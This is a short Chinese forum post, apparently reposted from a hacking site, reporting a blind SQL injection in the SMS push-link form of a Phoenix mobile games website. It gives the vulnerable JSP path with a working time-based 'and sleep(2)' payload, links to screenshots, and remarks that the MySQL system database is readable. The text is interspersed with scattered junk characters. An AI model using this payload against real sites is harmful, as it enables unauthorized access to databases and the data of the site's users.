简要描述:
* v. y0 x9 s) z5 C* N, |! s7 S凤凰手机游戏网,在填写手机号码发送push连接的地方存在sql盲注漏洞。$ Y0 M k& E( e
( x1 c/ t' F9 `5 \
详细说明:/ z4 ~8 [; F3 \% E# \) y! T
存在SQL盲注url:7 B+ Y$ N; D* O* w* w5 T4 b9 Q$ G
fenghuang/game/game_send_sms.jsp?gameid=130221346000%27%20and%20sleep%282%29%3d%27&mo=10 A9 K; P' J% v
http://www.myhack58.com/Article/UploadPic/2013-4/2013411254849748.png
$ y/ |; I& V) P0 \4 F$ dhttp://www.myhack58.com/Article/UploadPic/2013-4/20134112545369314.png# r5 T! v7 X0 [- @5 t# c# X: Z
http://www.myhack58.com/Article/UploadPic/2013-4/20134112565766695.jpg! r) u# T. f; K8 g, I4 U& V
8 E3 c5 x. \6 E, Z! _: }
能看到mysql系统数据库,看来user权限应该很高的。。 | 
发表于 2013-4-4 17:34:29
收藏
支持
反对